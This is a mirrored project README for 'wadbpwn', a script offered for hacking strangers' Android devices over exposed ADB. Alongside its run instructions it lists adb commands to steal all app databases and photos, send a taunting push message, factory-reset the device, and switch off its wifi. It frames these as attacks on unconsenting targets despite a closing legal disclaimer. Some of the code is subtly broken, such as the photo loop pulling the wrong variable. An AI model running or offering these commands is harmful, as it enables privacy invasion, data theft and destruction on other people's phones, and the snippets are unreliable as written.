Code Monkey home page Code Monkey logo

wadbpwn's Introduction

WADBPWN

Hack a random android device with 100% guarantee to succeed within 1 second from you launching the script.

The easiest methods that are the most effective methods

Screenshot

Get Started On Linux/MacOSX

git clone https://github.com/wuseman/wadbpwn
cd wadbpwn
chmod +x wadb*
bash ./wadbpwn.sh

- Wait ~1 second

Target has been pwned!

Enjoy ;-)

Get Started On Windows 10

Install any linux distro from microsoft store and run commands above..

Tips & Tricks made by wuseman

Steal all databases from the device ( require root )

which su &> /dev/null
if [[ $? -eq "0" ]]; then
   adb pull /data/data/ /some/path
else
   printf "* No root detected, just try another target..\n"
   exit 1
fi

Steal all pictures:

A simple example:
PICS="$(adb shell 'su -c find / \( -name '*.png' -name '*.jpg*' \)')"
for pictures in $PICS; do
   adb pull -p $PICS /some/folder
 done
printf "Done..is it your lucky day? ;-)\n"

Let the owner know that you have hacked him, send a push notice:

adb shell am broadcast -a com.google.android.c2dm.intent.RECEIVE -n <your.app.package>/com.google.android.gms.gcm.GcmReceiver --es "You h4v3 b33n h3cked mat3" "hrhr!"

For be an d*ck and do a factory reset of the device:

adb shell am broadcast -a android.intent.action.MASTER_CLEAR
adb shell reboot 

For be device owners hero for a day you should shut down the targets wifi connection, but why?

adb shell svc wifi disable

System requirements

  • Android Debug Bridge (adb) - Find more info about adb here

Changelog

Versions changelog.

Authors:

License

This project is licensed under the GNU General Public License v3.0 - see the LICENSE.md file for details

Contact

If you have problems, questions, ideas or suggestions please contact me on the e-email under Authors or you can chat with me for faster contact by visit freenode chat and type '/msg wuseman hi!' in the input bar and I will reply you ASAP I will see the message.

Enter Freenode chat via your own client or use the web client by visit this page

Haters Gonna Hate

wuseman cannot be held as responsible for users actions regardless of what damage a user can do. All users that gathering information or data via wadbpwn is 100% responsible for their own actions, wadbpwn has been developed for a legal purpose.

wadbpwn's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.